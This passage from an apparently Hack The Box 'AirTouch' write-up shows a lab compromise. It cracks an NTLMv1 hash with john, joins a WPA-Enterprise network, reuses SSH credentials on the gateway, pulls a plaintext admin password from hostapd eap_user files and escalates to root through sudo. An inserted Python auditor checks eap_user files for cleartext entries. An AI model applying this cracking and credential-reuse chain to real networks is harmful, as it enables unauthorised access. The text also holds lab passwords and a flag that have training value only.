┌──(kali㉿kali)-[~/Boxes/Hackthebox/Medium/AirTouch]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "netntlm", but the string is also recognized as "netntlm-naive"
Use the "--format=netntlm-naive" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlm, NTLMv1 C/R [MD4 DES (ESS MD5) 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
laboratory       (r4ulcl)
1g 0:00:00:00 DONE (2026-04-17 19:02) 1.250g/s 116025p/s 116025c/s 116025C/s politik..iceman11
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed.

To connect, it was necessary to create a new configuration file.

network {
	ssid="AirTouch-Office"
	key_mgmt=WPA-EAP
	eap=PEAP
	identity="Airtouch\r4ulcl"
	password="laboratory"
	phase1="peapver=1"
	phase2="auth=MSCHAPV2"	
}

And configure wpa_supplicant to connect to the new network.

root@AirTouch-Consultant:~/eaphammer# wpa_supplicant -B -c wpa1.conf -i wlan1
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device

And use dhclient to gain an IP on the network.

root@AirTouch-Consultant:~/eaphammer# dhclient -r && dhclient -v wlan1
Killed old client process
System has not been booted with systemd as init system (PID 1). Can't operate.
Failed to connect to bus: Host is down
System has not been booted with systemd as init system (PID 1). Can't operate.
Failed to connect to bus: Host is down
Internet Systems Consortium DHCP Client 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/wlan1/02:00:00:00:01:00
Sending on   LPF/wlan1/02:00:00:00:01:00
Sending on   Socket/fallback
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 3 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 3 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 5 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 9 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 18 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 18 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 11 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 13 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 10 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 17 (xid=0xdb78581d)
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 21 (xid=0xdb78581d)
DHCPOFFER of 10.10.10.98 from 10.10.10.1
DHCPREQUEST for 10.10.10.98 on wlan1 to 255.255.255.255 port 67 (xid=0x1d5878db)
DHCPACK of 10.10.10.98 from 10.10.10.1 (xid=0xdb78581d)
hostname: you must be root to change the host name
bound to 10.10.10.98 -- renewal in 344869 seconds.

Finally, I obtained the IP 10.10.10.98. Next, I used the credentials found earlier in send_certs.sh, remote : xGgWEwqUpfoOVsLeROeG, to connect to the gateway.

root@AirTouch-Consultant:~/eaphammer# ssh remote@10.10.10.1
The authenticity of host '10.10.10.1 (10.10.10.1)' can't be established.
ECDSA key fingerprint is SHA256:/lSCXr95A71FBCcQ9DT1xXMFeCAsLEnCUfSwu/3qPoE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.1' (ECDSA) to the list of known hosts.
remote@10.10.10.1's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

* Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
remote@AirTouch-AP-MGT:~$

Shell as root

Checking sudo permissions, I discovered I couldn't use sudo. Looking at the directories in /home, I found another user, admin. And upon checking processes with ps aux, I found hostapd running as root, pointing to the configuration files.

💡 Hostapd: hostapd (Host Access Point Daemon) is software for Linux/BSD systems that turns Wi-Fi network cards into access points (hotspots) and authentication servers. It supports IEEE 802.11 and WPA/WPA2/WPA3 networks and can act as a RADIUS server, which makes it ideal for building Wi-Fi routers from PCs or Raspberry Pis.

I then searched for any mention of admin in the hostapd configuration files.

remote@AirTouch-AP-MGT:/$ grep -r 'admin' /etc/hostapd/
/etc/hostapd/hostapd_wpe.conf.tmp:# text file that could be used, e.g., to populate the AP administration UI with
/etc/hostapd/hostapd_wpe.conf.tmp:# administered bit)
/etc/hostapd/hostapd_wpe.eap_user:"admin"			                MSCHAPV2		"xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
/etc/hostapd/hostapd_wpe2.conf.tmp:# text file that could be used, e.g., to populate the AP administration UI with
/etc/hostapd/hostapd_wpe2.conf.tmp:# administered bit)

Reading the file /etc/hostapd/hostapd_wpe.eap_user, I found the admin credentials in plaintext.

# WPE - DO NOT REMOVE - These entries are specifically in here
*		PEAP,TTLS,TLS,FAST
#"t"	    TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "t"	[2]

* PEAP,TTLS,TLS,FAST [ver=1]
#"t" GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]
"AirTouch\r4ulcl"       MSCHAPV2  "laboratory" [2]
"admin"                   MSCHAPV2  "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
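As an added audit example (my own code, not from the write-up or from hostapd), here is a small parser for hostapd's eap_user format that reports which identities are stored with a cleartext password and checks whether the file's mode lets anyone but root read it. The sample input is the file above; the names parse_eap_user, cleartext_credentials and mode_is_too_permissive are mine.

```python
import re
import stat
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the hostapd_wpe.eap_user contents shown in the write-up.
SAMPLE_EAP_USER = r'''
# WPE - DO NOT REMOVE - These entries are specifically in here
*		PEAP,TTLS,TLS,FAST
#"t"	    TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2  "t"	[2]

* PEAP,TTLS,TLS,FAST [ver=1]
"AirTouch\r4ulcl"       MSCHAPV2  "laboratory" [2]
"admin"                   MSCHAPV2  "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
'''


@dataclass
class EapUser:
    identity: str            # "*" is the wildcard entry used for the outer tunnel
    methods: List[str]       # e.g. ["MSCHAPV2"] or ["PEAP", "TTLS", "TLS", "FAST"]
    password: Optional[str]  # None when the entry carries no credential
    cleartext: bool          # True for a quoted literal; False for hash:<NT hash>
    phase2: bool             # True for inner (tunnelled) entries marked [2]


# A token is either a double-quoted string (may contain spaces or backslashes)
# or a run of non-blank characters.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def parse_eap_user(text: str) -> List[EapUser]:
    """Parse eap_user lines of the form: identity methods [password] [2|ver=N]."""
    users = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank or comment (also commented-out entries)
        tokens = _TOKEN.findall(line)
        if len(tokens) < 2:
            continue                      # hostapd rejects such lines; nothing to audit
        identity = tokens[0].strip('"')
        methods = tokens[1].split(",")
        password, cleartext, phase2 = None, False, False
        for tok in tokens[2:]:
            if tok == "[2]":
                phase2 = True
            elif tok.startswith("["):     # other options such as [ver=1]
                continue
            elif tok.startswith('"'):
                password, cleartext = tok.strip('"'), True
            elif tok.startswith("hash:"):
                password, cleartext = tok[len("hash:"):], False
        users.append(EapUser(identity, methods, password, cleartext, phase2))
    return users


def cleartext_credentials(users: List[EapUser]) -> List[str]:
    """Identities whose password sits in the file as a readable literal."""
    return [u.identity for u in users if u.cleartext]


def mode_is_too_permissive(mode: int) -> bool:
    """True if group or others can read the file; eap_user should be 0600 and root-owned,
    since even hash: entries are password-equivalent for MSCHAPv2."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


if __name__ == "__main__":
    parsed = parse_eap_user(SAMPLE_EAP_USER)
    for ident in cleartext_credentials(parsed):
        print(f"cleartext password stored for identity {ident!r}")
    print("0644 too permissive:", mode_is_too_permissive(0o644))
```

Storing the NT hash with hash: removes the literal password (and the reuse shown later on this box), but the hash still authenticates via MSCHAPv2, so the file mode check is the control that actually matters.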

With this, I was able to switch to the admin user.

remote@AirTouch-AP-MGT:/$ su admin
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@AirTouch-AP-MGT:/$

And admin could become root using sudo. Thus, I became root and retrieved the root flag.

admin@AirTouch-AP-MGT:/$ sudo -l
Matching Defaults entries for admin on AirTouch-AP-MGT:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on AirTouch-AP-MGT:
    (ALL) ALL
    (ALL) NOPASSWD: ALL

admin@AirTouch-AP-MGT:/$ sudo -i
root@AirTouch-AP-MGT:~# ls
certs  mgt  root.txt  start.sh  wlan_config_aps
root@AirTouch-AP-MGT:~# cat root.txt
1b60483ac751f5adafb630c03c23ff94
root@AirTouch-AP-MGT:~#

Conclusion

Pwned!!

On this machine, I learned that network segmentation (VLANs) is ineffective if there are flaws in identity management and credential storage. I managed to jump from the Consultant VLAN to the Tablets VLAN and finally to the Corporate one due to password reuse and credentials exposed in router configuration files. It was also very cool to be able to perform wifi hacking again after so much time.

I really hope you enjoyed this step-by-step guide. If you did, please consider using the clap button as much as possible and subscribing so you don't miss future posts.

I'd also like to know what you thought of this machine and what problems you encountered. How about leaving your opinion in the comments section?

Thanks for reading to the end. See you next time!